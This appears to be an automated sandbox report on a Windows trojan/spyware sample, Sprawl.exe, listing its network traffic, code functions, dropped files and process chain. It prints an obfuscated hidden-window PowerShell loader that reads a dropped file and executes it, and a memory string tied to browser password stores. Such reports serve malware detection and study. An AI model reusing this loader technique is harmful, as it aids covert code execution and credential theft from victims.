            Source: unknown | Network traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 50009 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49989 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 50001 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49986 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 50005 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49997
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknown | Network traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50009
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49993
            Source: unknown | Network traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknown | Network traffic detected: HTTP traffic on port 50020 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50001
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50005
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknown | Network traffic detected: HTTP traffic on port 49987 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 50023 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49993 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49989
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49987
            Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:49987 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:49986 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49988 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49989 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50023 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50025 version: TLS 1.2
            Source: C:\Users\user\Desktop\Sprawl.exe | Code function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

            System Summary

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\Sprawl.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78E439 NtResumeThread
            Source: C:\Users\user\Desktop\Sprawl.exe | Code function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Sprawl.exe | Code function: 0_2_004048C5
            Source: C:\Users\user\Desktop\Sprawl.exe | Code function: 0_2_004064CB
            Source: C:\Users\user\Desktop\Sprawl.exe | Code function: 0_2_00406CA2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04D2DE58
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78D307
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78BB14
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78CBFB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78CBF3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78EA15
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78CAC8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78BAC2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78EABC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78E804
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78D8B9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78DF1B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78DF0B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78BFF9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78DD52
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78CDEE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78DC2C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78CC1B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78CC13
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78CC0B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78CC03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C3E9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78E25A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C29B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C28B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C283
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C17B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C167
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78D04D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C67F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C667
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C64A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78D635
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C690
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78E5F4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C44F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C447
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C437
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C42F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B78C427
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75AB0C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75C3B0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75C245
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75AA4B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75AA3B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75C23B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75B217
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75BA18
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75AA1A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75C2D6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75C2CF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75C2AF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75B2AE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75B173
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75B17B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75B163
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75B16B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75C1A3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75C1AB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75C193
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75C19B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75B183
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75B008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75BF77
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75BF57
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75BF5F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75BF19
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75DE68
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75A613
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75A603
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75A60B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75AEE7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75AED7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75AEDF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75AEC7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75B6C3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75AECF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75A54E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75A5F3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75A5FB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75ADE7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75A5EB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75AC57
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75AC5F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75AC47
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75AC37
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75AC3F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75B41F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75A4D3
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_21CEC147
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_21CE5362
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_21CED278
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_21CEC468
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_21CEC738
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_21CEE988
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_21CECA08
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_21CECCD8
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_21CECFA9
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_21CE3E09
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_21CE29E0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_21CEE97A
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_21CEF974
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_21CE6FC8
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_03235362
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_0323D278
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_0323C146
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_0323C738
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_0323C468
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_0323CA08
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_0323E988
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_0323CFAA
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_0323CCD8
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_03233AA1
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_0323F961
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_0323E97A
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_032369A0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_032339EE
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_032329EC
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_03236FC8
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_03233E09
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_03239DE0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AFC68
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256ACCA0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A17A0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A1E80
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A2968
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A9548
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AD540
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AD550
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256ADDFF
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A9C70
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256ACC8F
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AEF60
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AEF51
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A178F
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A1E70
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256ADE00
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AE6AF
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AE6B0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AD9A8
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AD999
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A0040
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A5028
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AF802
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A5018
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A0012
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AF810
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AD0F8
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A9328
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A0B20
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A0B30
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AEB08
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A9BF7
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AF3A8
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A8BA0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AF3B8
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256A8B91
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AE24A
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AE258
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_256AEAF8
            Source: Sprawl.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@11/18@6/6
            Source: C:\Users\user\Desktop\Sprawl.exe | Code function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Sprawl.exe | Code function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHAutoComplete,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceExA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
            Source: C:\Users\user\Desktop\Sprawl.exe | Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar
            Source: C:\Users\user\Desktop\Sprawl.exe | File created: C:\Users\user\AppData\Roaming\underarmsmusklens
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
            Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2324:120:WilError_03
            Source: C:\Users\user\Desktop\Sprawl.exe | File created: C:\Users\user\AppData\Local\Temp\nsuF132.tmp
            Source: Sprawl.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Sprawl.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Sprawl.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000022055000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000022089000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000022095000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000022064000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000022046000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022BB6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B76000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022BAA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B84000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B66000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Sprawl.exe | ReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\Sprawl.exe | File read: C:\Users\user\Desktop\Sprawl.exe
            Source: unknown | Process created: C:\Users\user\Desktop\Sprawl.exe "C:\Users\user\Desktop\Sprawl.exe"
            Source: C:\Users\user\Desktop\Sprawl.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Sprawl.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Sprawl.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
            Source: C:\Users\user\Desktop\Sprawl.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Sprawl.exe | Section loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
